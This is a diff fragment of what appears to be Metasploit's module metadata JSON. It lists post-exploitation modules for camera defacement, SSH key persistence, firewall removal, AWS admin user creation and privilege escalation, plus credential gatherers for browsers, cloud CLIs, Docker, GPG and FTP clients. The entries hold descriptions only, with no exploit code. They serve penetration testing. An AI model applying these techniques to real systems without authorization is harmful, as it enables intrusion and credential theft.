+ "ref_name": "linux/manage/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/geutebruck_post_exp": { + "name": "Geutebruck Camera Deface", + "fullname": "post/linux/manage/geutebruck_post_exp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ibrahim Ayadhi", + "Sébastien Charbonnier" + ], + "description": "This module will take an existing session on a vulnerable Geutebruck Camera\n and will allow the user to either freeze the camera and display the last\n image from the video stream, display an image on the camera, or restore\n the camera back to displaying the current feed/stream.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-09-03 12:30:12 +0000", + "path": "/modules/post/linux/manage/geutebruck_post_exp.rb", + "is_install_path": true, + "ref_name": "linux/manage/geutebruck_post_exp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CHANGE_IMAGE", + "description": "Display an arbitrary image instead of the video stream" + }, + { + "name": "FREEZE_CAMERA", + "description": "Freeze the camera and display the last image taken from the video stream" + }, + { + "name": "RESUME_STREAM", + "description": "Resume the camera's video stream and display the current live feed" + } + ] + }, + "post_linux/manage/iptables_removal": { + "name": "IPTABLES rules removal", + "fullname": "post/linux/manage/iptables_removal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/manage/iptables_removal.rb", + "is_install_path": true, + "ref_name": "linux/manage/iptables_removal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/pseudo_shell": { + "name": "Pseudo-Shell Post-Exploitation Module", + "fullname": "post/linux/manage/pseudo_shell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will run a Pseudo-Shell.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/manage/pseudo_shell.rb", + "is_install_path": true, + "ref_name": "linux/manage/pseudo_shell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/sshkey_persistence": { + "name": "SSH Key Persistence", + "fullname": "post/linux/manage/sshkey_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die " + ], + "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/manage/sshkey_persistence.rb", + "is_install_path": true, + "ref_name": "linux/manage/sshkey_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/aws_create_iam_user": { + "name": "Create an AWS IAM User", + "fullname": "post/multi/escalate/aws_create_iam_user", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Godinez ", + "Jon Hart " + ], + "description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.", + "references": [ + "URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf" + ], + "platform": "Unix", + "arch": "", + "rport": 443, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", + "is_install_path": true, + "ref_name": "multi/escalate/aws_create_iam_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/cups_root_file_read": { + "name": "CUPS 1.6.1 Root File Read", + "fullname": "post/multi/escalate/cups_root_file_read", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-20", + "type": "post", + "author": [ + "Jann Horn", + "joev " + ], + "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.", + "references": [ + "CVE-2012-5519", + "OSVDB-87635", + "URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791" + ], + "platform": "Linux,OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/cups_root_file_read.rb", + "is_install_path": true, + "ref_name": "multi/escalate/cups_root_file_read", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/metasploit_pcaplog": { + "name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation", + "fullname": "post/multi/escalate/metasploit_pcaplog", + "aliases": [], + "rank": 0, + "disclosure_date": "2012-07-16", + "type": "post", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708" + ], + "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.", + "references": [ + "BID-54472", + "URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html", + "URL-https://community.rapid7.com/docs/DOC-1946" + ], + "platform": "BSD,Linux,Unix", + "arch": "", + "rport": 2940, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", + "is_install_path": true, + "ref_name": "multi/escalate/metasploit_pcaplog", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/apple_ios_backup": { + "name": "Windows Gather Apple iOS MobileSync Backup File Collection", + "fullname": "post/multi/gather/apple_ios_backup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm ", + "bannedit " + ], + "description": "This module will collect sensitive files from any on-disk iOS device backups", + "references": [], + "platform": "OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/apple_ios_backup.rb", + "is_install_path": true, + "ref_name": "multi/gather/apple_ios_backup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/aws_ec2_instance_metadata": { + "name": "Gather AWS EC2 Instance Metadata", + "fullname": "post/multi/gather/aws_ec2_instance_metadata", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.", + "references": [ + "URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" + ], + "platform": "Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", + "is_install_path": true, + "ref_name": "multi/gather/aws_ec2_instance_metadata", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/aws_keys": { + "name": "UNIX Gather AWS Keys", + "fullname": "post/multi/gather/aws_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.", + "references": [ + "URL-http://s3tools.org/kb/item14.htm", + "URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files" + ], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/aws_keys.rb", + "is_install_path": true, + "ref_name": "multi/gather/aws_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/azure_cli_creds": { + "name": "Azure CLI Credentials Gatherer", + "fullname": "post/multi/gather/azure_cli_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "James Otten ", + "h00die" + ], + "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n for all users on a given target. These configuration files contain\n JWT tokens used to authenticate users and other subscription information.\n Once tokens are stolen from one host, they can be used to impersonate\n the user from a different host.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-06-27 10:45:05 +0000", + "path": "/modules/post/multi/gather/azure_cli_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/azure_cli_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/check_malware": { + "name": "Multi Gather Malware Verifier", + "fullname": "post/multi/gather/check_malware", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will check a file for malware on VirusTotal based on the checksum.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/check_malware.rb", + "is_install_path": true, + "ref_name": "multi/gather/check_malware", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/chrome_cookies": { + "name": "Chrome Gather Cookies", + "fullname": "post/multi/gather/chrome_cookies", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mangopdf " + ], + "description": "Read all cookies from the Default Chrome profile of the target user.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/chrome_cookies.rb", + "is_install_path": true, + "ref_name": "multi/gather/chrome_cookies", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dbeaver": { + "name": "Gather Dbeaver Passwords", + "fullname": "post/multi/gather/dbeaver", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/dbeaver.rb", + "is_install_path": true, + "ref_name": "multi/gather/dbeaver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dbvis_enum": { + "name": "Multi Gather DbVisualizer Connections Settings", + "fullname": "post/multi/gather/dbvis_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts the encrypted passwords.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dbvis_enum.rb", + "is_install_path": true, + "ref_name": "multi/gather/dbvis_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_bruteforce": { + "name": "Multi Gather DNS Forward Lookup Bruteforce", + "fullname": "post/multi/gather/dns_bruteforce", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Brute force subdomains and hostnames via wordlist.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_bruteforce.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_bruteforce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_reverse_lookup": { + "name": "Multi Gather DNS Reverse Lookup Scan", + "fullname": "post/multi/gather/dns_reverse_lookup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Performs DNS reverse lookup using the OS included DNS query command.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_reverse_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/dns_srv_lookup": { + "name": "Multi Gather DNS Service Record Lookup Scan", + "fullname": "post/multi/gather/dns_srv_lookup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Enumerates known SRV Records for a given domain using target host DNS query tool.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/dns_srv_lookup.rb", + "is_install_path": true, + "ref_name": "multi/gather/dns_srv_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/docker_creds": { + "name": "Multi Gather Docker Credentials Collection", + "fullname": "post/multi/gather/docker_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Flibustier" + ], + "description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. If the user has already push to docker hub, chances are that the password was\n saved in base64 (default behavior).", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/docker_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/docker_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/electerm": { + "name": "Gather electerm Passwords", + "fullname": "post/multi/gather/electerm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if electerm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible.", + "references": [ + "URL-https://blog.kali-team.cn/metasploit-electerm-6854f3d868eb45eab6951acc463a910d" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/electerm.rb", + "is_install_path": true, + "ref_name": "multi/gather/electerm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/enum_hexchat": { + "name": "Linux Gather HexChat/XChat Enumeration", + "fullname": "post/multi/gather/enum_hexchat", + "aliases": [ + "post/linux/gather/enum_xchat" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r ", + "h00die" + ], + "description": "This module will collect HexChat and XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.", + "references": [ + "URL-https://hexchat.readthedocs.io/en/latest/settings.html" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/enum_hexchat.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_hexchat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ALL", + "description": "Collect both the configs and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + }, + { + "name": "CONFIGS", + "description": "Collect config files" + } + ] + }, + "post_multi/gather/enum_software_versions": { + "name": "Multiplatform Installed Software Version Enumerator", + "fullname": "post/multi/gather/enum_software_versions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "gwillcox-r7" + ], + "description": "This module, when run against a compromised machine, will gather details on all installed software,\n including their versions and if available, when they were installed, and will save it into a loot file for later use.\n Users can then use this loot file to determine what additional vulnerabilites may affect the target machine.\n\n Note that for Linux systems, software enumeration is done via package managers. As a result the results may\n not reflect all of the available software on the system simply because users may have installed additional\n software from alternative sources such as source code that these package managers are not aware of.", + "references": [], + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/enum_software_versions.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_software_versions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/enum_vbox": { + "name": "Multi Gather VirtualBox VM Enumeration", + "fullname": "post/multi/gather/enum_vbox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/enum_vbox.rb", + "is_install_path": true, + "ref_name": "multi/gather/enum_vbox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/env": { + "name": "Multi Gather Generic Operating System Environment Settings", + "fullname": "post/multi/gather/env", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "egypt " + ], + "description": "This module prints out the operating system environment variables.", + "references": [], + "platform": "Linux,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-01 13:37:15 +0000", + "path": "/modules/post/multi/gather/env.rb", + "is_install_path": true, + "ref_name": "multi/gather/env", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "powershell", + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/fetchmailrc_creds": { + "name": "UNIX Gather .fetchmailrc Credentials", + "fullname": "post/multi/gather/fetchmailrc_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/fetchmailrc_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/filezilla_client_cred": { + "name": "Multi Gather FileZilla FTP Client Credential Collection", + "fullname": "post/multi/gather/filezilla_client_cred", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "Carlos Perez " + ], + "description": "This module will collect credentials from the FileZilla FTP client if it is installed.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/filezilla_client_cred.rb", + "is_install_path": true, + "ref_name": "multi/gather/filezilla_client_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/find_vmx": { + "name": "Multi Gather VMWare VM Identification", + "fullname": "post/multi/gather/find_vmx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will attempt to find any VMWare virtual machines stored on the target.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/find_vmx.rb", + "is_install_path": true, + "ref_name": "multi/gather/find_vmx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/firefox_creds": { + "name": "Multi Gather Firefox Signon Credential Collection", + "fullname": "post/multi/gather/firefox_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "xard4s", + "g0tmi1k" + ], + "description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded. Which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non working state. If a\n Master Password was used the only option would be to bruteforce.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/firefox_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/firefox_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/gpg_creds": { + "name": "Multi Gather GnuPG Credentials Collection", + "fullname": "post/multi/gather/gpg_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Dhiru Kholia ", + "Henry Hoggard" + ], + "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/gpg_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/gpg_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/grub_creds": { + "name": "Gather GRUB Password", + "fullname": "post/multi/gather/grub_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Garvit Dewan ", + "Taeber Rapczak ", + "Shelby Pace" + ], + "description": "This module gathers GRUB passwords from GRUB bootloader config files.", + "references": [ + "URL-https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption" + ], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/grub_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/grub_creds", + 